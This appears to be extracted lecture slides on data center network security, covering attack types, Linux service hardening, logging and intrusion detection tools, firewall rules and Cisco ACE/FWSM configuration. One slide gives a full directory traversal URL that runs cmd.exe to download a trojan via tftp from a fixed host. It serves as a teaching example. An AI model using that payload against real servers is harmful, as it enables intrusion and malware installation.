Data Center Network Security

History

• Old days – security = planting two firewalls

• Today – security = very complex problem

Type of attacks• Atacks on networks became more sophisticated and are carried

through, but not limited to, one of the following techniques:– Packet sniffing— An application that uses the promiscuous mode of the

network adapter to capture all networks packets.– IP spoofing— An attack in which a hacker assumes an IP address of

others to conceal its true identity– Denial-of-service (DoS) attack— Aims to overwhelm a service so as to

deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following:

• Code Red• Blaster• Ping of Death• Trinity

Type of attacks• Password attack— As its name implies, this attack intends to

acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force

• Man-in-the-middle attack— This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method

• Application attack— This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed

• Port redirection attack— This type of attack makes use of a compromised host to gain access to a network that is otherwise protected

Typical Intrusion SequenceHacking the Web/Application Server

• After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server

• The hacker exploits the vulnerability to get a shell• For example:

– Copy the Trojan on the web/application server:• HTTPS://www.example.com/scripts/..%c0%af../winnt/

system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe

Automated Intrusion Sequence—Blaster Ex.

Attack Patterns

Server Farm Security Strategies

Segmenting the Server Farm

Building the Firewall Ruleset

From Physical Separationto Logical Separation

Avoid Break-ins in Linux

• To save on system resources and make system administration less complex, many services are handled through a configuration file /etc/inetd.conf. This file tells the system how to run each of the available services.

• Many Linux vendors turn on various services in inetd.conf by default when for maximum security they should be off!

• In many corporate environments security as such is not an issue. If there is enough security to prevent accidental damage in these 'soft' environments providing access to these services is more important than preventing them.

• If your Linux host is exposed to the Internet you may hold a different point of view though. To check what services are currently running on your Linux system, type the command

• netstat -vat

• This will print up something like this

tcp 0 0 *:6000 *:* LISTEN tcp 0 0 *:www *:* LISTEN tcp 0 0 *:auth *:* LISTEN tcp 0 0 *:finger *:* LISTEN tcp 0 0 *:shell *:* LISTEN tcp 0 0 *:sunrpc *:* LISTEN

• Each line that says LISTEN is a service waiting for connections.

Avoid Break-ins in Linux

• Some of these services run as stand-alone programs, but many of them are controlled by /etc/inetd.conf. If you are not sure what a service does, look it up in /etc/inetd.conf. For instance, if you type

• grep '^finger' /etc/inetd.conf

• you will get back a line from inetd.conf like this

• finger stream tcp nowait nobody /usr/sbin/tcpd /usr/sbin/in.fingerd

Avoid Break-ins in Linux

• To see what the program does, look up in.fingerd in the man page.

• If you think you can live without this service, then it can be turned off in /etc/inetd.conf.

• By commenting out the line (put a # at the start of the line) and then issuing the command

kill all -HUP inetd

you can immediately and permanently turn a service off. There is no need to reboot.

Avoid Break-ins in Linux

• If a service is not listed in /etc/inetd.conf then it probably runs as a stand-alone program.

• You can remove a service provided by a stand-alone background program by uninstalling its package. Only do this if you are sure about what the program does and are certain that it is not necessary.

Avoid Break-ins in Linux

SSH

• To add extra security to the various services, Linux has a system for allowing and denying them to chosen hosts. For instance, you may wish to allow logins from machines at your own site, but not from the Internet. The files /etc/hosts.allow and /etc/hosts.deny list allowed services and hosts.

SSH

• The method of denying connections by checking the host provides a good basic method for throwing off attacks.

• It is not the end of the story. • It is possible to fake host names on incoming

connections ( oh yes it is ). • While data is in transit between programs over the

Internet it is also in danger. Anyone with the knowledge can look at your data. Using a method known as 'spoofing' they can even inject fake data into a legitimate stream.

• These problems come about because of the way that Internet protocols interact. To overcome these difficulties ssh was devised.

SSH

• Ssh is a stable, well-developed system with open source that provides encryption and authentication on connections.

• Encryption is using codes to protect the packets of data while in transit.

• Authentication is a process for verifying if a.packet of data or a connection is valid.

• There are ssh clients for most other operating systems too.

• By using Linux as a server you can provide ssh level security for all your network use.

Logging

• Linux has a comprehensive set of subsystems to let the systems administrator know what is going on with his or her system.

• All manner of log files are generally kept in the /var/log directory.

• Most of the standard services log information to /var/log/syslog and /var/log/messages about users connecting to them or attempting to connect.

• There are also log files for such services as apache (/var/log/httpd/access_log), mail (/var/log/mail) and firewall (/var/log/firewall).

• The main problem with logging events is that one tends to end up with too much data.

• Careful filtering and only logging important information is important.

Logging

Logging

• There are some good tools out there that will make this work easier.

• Ethereal is a packet sniffer – With it you can capture various types of packets over

a given period of time. – It also shows all manner of information about the

packets. – It's useful for watching packets coming into and going

out of your machine. – Generally it will detect traffic on your network

segment.

• Another logging/intrusion detection type tool is called Tripwire. – It takes a snapshot of your important system files and

records their signature in a database. – Various signature levels are available from mild to

wild. – You can also set the rules in a policy file to tell

Tripwire what to check. – After the database is initialized and signed Tripwire

can be executed whenever you need to check the integrity of your system.

– The report will point out when your files are changed and the severity of the security risk. The Tripwire report is pretty easy to read and can be customized according to your file tracking needs.

Logging

• A popular program for detecting access attempts (via the network) and port scans is Snort.

• The program produces files that log these types of activities and even gives some idea of where to find out more information.

• The same problem as with other log files. It gets tough for a busy system administrator to review all the log files on a regular basis

Logging

Firewalls

• A firewall is a device that protects a private network from the wider Internet. – The simplest form of firewall is a Linux machine with one

network connection ( an Ethernet card or modem ) connected to the Internet and the other connected to the private network.

– The Firewall computer can reach the protected network and the Internet.

– This traffic between the protected network and the Internet is controlled, in both directions by a list of rules.

– These rules can be customized for your needs. • CoyoteLinux.com has a firewall system that fits on a floppy and

doesn't need a hard disk to run. It's design specifically to address the need for an easy to install no-nonsense Linux firewall

• All data flowing to and from the Internet and the private network is filtered by the firewall.

• Inside the private network less care needs to be taken with turning off services and the like.

• It is a way of concentrating effort on making one machine secure and protecting many others in the process.

• The methods for correctly setting up firewalls are quite complex. – First you have to configure your machine for two

Ethernet cards. – Then you have to use the IP-chains/IP-tables

software to set up filters which connect the two Ethernet cards data links.

Firewalls

• The main drawback with making your systems more secure is that they become less accessible.

• The idea behind ramping up your system's security is to stop use of your computers, by crooks, thieves and malcontents but let the legitimate users use the system

Firewalls

Tools

• Tools for defense can be grouped into four categories: – log monitoring – connection monitoring– host based intrusion detection– network based intrusion detection

Log Monitoring

• These tools will watch over your log files and help you detect security related events (actually, based on the rules, you can have them detect any type of event). Either by default, or through configuration, they can e-mail you the alerts.– autobuse – logcheck– Logwatch– swatch

Connection Monitoring

• When connected to the internet, unless a firewall is in place, other systems can connect to yours. These tools will help you know who is connecting to your box, even to the point of detecting stealth scans that normal logging will not catch.– ippl– jail– klaxon– portsentry– tcplogd

Host based intrusion detection

• These days, it's often difficult to know if an intrusion has taken place. Upon successfully gaining root privilege, an intruder will often erase the logs of the break-in. Quite often, they will take an additional step of installing a set of trojan binaries known as a rootkit. These tools help to detect the intrusion, sometimes even after the intruder has gained root access.– hostsentry– Tripwire– ViperDB

Network based intrusion detection

• These tools will help detect intrusions (or intrusion attempts) across your entire network, not just on individual hosts. They will look at the traffic and attempt to match known attack patterns and notify you if an attack is seen.– Network Flight Recorder– SHADOW– snort

Linux Firewalls• Linux Firewalls

• * Define a Network Security Policy• * Use a Secure Linux Distro for your firewall• * Harden your firewall• o Install the minimum number of packages• o Turn all unused services off• o Disallow user logins • * Define a set of Firewall Rules• * Define egress and ingress filters• * You'd probably need to IPMasquerade or NAT• o Allows internal machine to get out on the net• o Outside world see these internal machines as www.foo.com • * Start with existing/proven/simple Example Firewall configurations

• * Test your Firewall from the inside and outside• o Apply all known Exploits and vulnerabilities• o Apply all known Hacking Tools and attacks• o Apply all known Rootkits

• Installing a Firewall does NOT solve the "security" problem

Linux Firewall Rules• Firewall Rules

• SecurityFocus.net

• Example Firewall Scripts

• Linux-Sec.net/FW/Scripts Example Firewall Scripts

• General Firewall Rules

• * Turn on ingress and egress Rules

• * Turn on/off various /proc options

• * Outgoing Rules• Allow all internal PCs to freely access the Internet • * Incoming Rules• Allow incoming DNS requests to the DNS server• Allow incoming SMTP requests to the mail server• Allow incoming HTTP requests to the web server• Allow incoming FTP requests to the ftp server• Allow incoming ssh requests to the ssh server• Allow incoming wireless requests to the wireless gw server• Allow incoming ppp requests to the ppp gw server• Allow incoming secure pop3/imap requests to the secure pop server• Allow incoming authenticated vpn requests to the vpn server

• Disallow messenger.msn.com• Disallow oscar.aol.com• Disallow messenger.yahoo.com (IIRC)

• NAT Rules

• IP Masquerade

• E-InfoMax.com IPMasquerade• IPMasq.cjb.net IP_Masuerade-HOWTO• LinuxDoc.org IP_Masquerade-HOWTO• CSUChico.edu

• 3-line IP Masquerade• LinuxDoc.org

• ipchains -P forward DENY• ipchains -A forward -i ppp0 -j MASQ• echo 1 > /proc/sys/net/ipv4/ip_forward

• Egress and Ingress Filtering

• * Ingress Filtering: incoming network traffic entering your LAN

• IETF.org RFC2827.txt• Sans.org Packet_filter - ingress/egress• Sans.org Firewall Issues

• * Egress Filtering: outoging network traffic leaving your LAN

• Sans.org Top Ten Blocking Recommendations Using IPChains• Sans.org ipchains Egress Rules• Sans.org Egress Filtering - cisco• Sans.org Egress Filtering ( same as above )• Incidents.org Egress - cicso

Linux Firewall Rules

• Cisco ACLs

• Firewalls/HowTo/#Cisco Cisco ACLs

• Proxy Server Rules

• HiSecure Proxy(?)• tcpr ftp and telnet forwarder• COAST udprelay• Dec.com XForward

• ReDir port redirector• Reverse Pimpage Revision remotely access machines behind a firewall• Reverse Utilities telnet/http/ssh access to machines behind a firewall• * Sock5• SourceForge.net Tsocks• SourceForge.net socksd• inet.no• inet.no dante• Umich.edu nylon• SolSoft NSM proxy-based firewall• httpf filters out java, js, etc• tproxy• Squid-Cache.org• * TIS Proxy Server

Linux Firewall Rules

Data Center Firewalls

• FWSM– Protocol support– Syslog– Management tools– DoS protection

ACE

• ACE = Application control engine– provides application and network operations

management with new levels of control over the way they deploy, operate, deliver, secure and manage their applications and business services across the extended enterprise. It helps enable greater control over the application infrastructure, allowing organizations to quickly deploy and migrate applications, delivering the highest levels of services to the end user while simplifying the overall management and operation of a data center.

FWSM

• FWSM = Firewall Service Module

MARS

• MARS = Monitoring, Analysis and Response System

Data Center Firewalls

• ACE– Integrated SLB and SSL– High capacity– Failover group per context– Failover tracking by HSRP, interface, IP address– Autostate aware– Role based access control– Configuration rollback marking– Bridge-mode: interface pairs per context– Advanced http inspection: mime/regex

ACE—FWSM Security Comparison

• Access Lists• Inspection Engines• Timeouts• Private VLANs• Role Based Access Control• Failover• Resource Allocation• Configuration Rollback• VLAN Assignments

Stateful ACLs—Bridge Mode Context

• ACENote: ACE Loggin Phase 2• access-list BPDU ethertype permit bpdu• access-list blue extended permit ip any

any• interface vlan 104• bridge-group 1• access-group input BPDU• access-group input blue• no shutdown• interface vlan 204• bridge-group 1• access-group input BPDU• access-group input blue• no shutdown• interface bvi 1• ip address 12.20.40.6 255.255.255.0• alias 12.20.40.8 255.255.255.0• peer ip address 12.20.40.7

255.255.255.0• no shutdown• ip route 0.0.0.0 0.0.0.0 12.20.40.1

• FWSM 3.1• firewall transparent• access-list BPDU ethertype permit bpdu• access-list blue extended permit ip any

any• interface Vlan104• nameif outside• bridge-group 1• security-level 0• interface Vlan40• nameif inside• bridge-group 1• security-level 100• interface BVI1• ip address 12.20.40.4 255.255.255.0

standby 12.20.40.5• access-group BPDU in interface outside• access-group blue in interface outside• access-group BPDU in interface inside• access-group blue in interface inside• route outside 0.0.0.0 0.0.0.0 12.20.40.1 1

Inspection Compared

HTTP Inspection• RFC 2616 compliance and filtering

– Protocol Conformance: The 1st line of a request is "Method SP" and that of response is “HTTP-Version SP”, etc.

– De-obfuscation: Override attempts to avoid regex searches by encoding the URL– Methods: OPTIONS, GET, POST, HEAD, PUT, DELETE, TRACE, CONNECT– Extensions: INDEX, MOVE, MKDIR, COPY, EDIT, UNEDIT, SAVE, LOCK, NLOCK,

REVLABEL, REVLOG, REVNUM,– SETATTRIBUTE, GETATTRIBUTE, GETATTRIBUTENAMES, GETPROPERTIES,

STARTREV, STOPREV• Length and encoding checks

– Length: Configurable range for URL and URL Header requests and responses– Encoding: chunked | compress | deflate | gzip | identity

• Detect HTTP misuse– Peer-to-peer (p2p) applications: Kazaa, Gnutella– Tunneling applications: HTTPort/HTTHost, FireThru– Instant Messaging: (IMI—YAHOO Messenger)

• MIME type validation and filtering (ACE only)– Audio: /*, /midi, /basic, /mpeg, /x-adpcm, /x-aiff, /x-ogg, x-wav (8)– Image: /*, /cgf, /gif, /jpeg, /png, /tiff, /x-3ds, /x-bitmap, /x-niff, /x-portable, /x-xpm (11)– Text: /*, /css, /html, /plain, /richtext, /sgml, /xmcd, /xml (8– Video: /*, /-flc, /mpeg, /quicktime, /sgi, /x-avi, /x-fli, /x-mng, /x-msvideo (9)– Application: /msword, /octet-stream, /pdf, /postscript, /vnd.ms-excel, /vnd.ms-

powerpoint, /x-gzip, /x-java-archive,– /x-java-vm, /zip (10)

• Regex filtering on HTTP messages (ACE only)– Detect protocol running on top of HTTP, i.e., to detect Yahoo Messenger, look for

YMSG in the first 4 bytes

HTTP Inspection Ex.—Allow Only GETs

Timeouts per FlowFWSM 3.1class-map TN3270-class

match port tcp eq 23policy-map TN3270-policy class TN3270-classset connection timeout embryonic 0:00:30

half-closed 0:10:00 tcp 24:00:00service-policy TN3270-policy interface inside

ACEparameter-map type connection TN3270 set timeout inactivity 86400class-map match-all TN3270-class 2 match port tcp eq telnetpolicy-map multi-match TN370-policy class TN3270-class connection advanced-options TN3270interface vlan 307 service-policy input TN370-policy

Private VLANs with Service Modules

Role-Based Access with ACE

Customizing Roles and Domains with ACE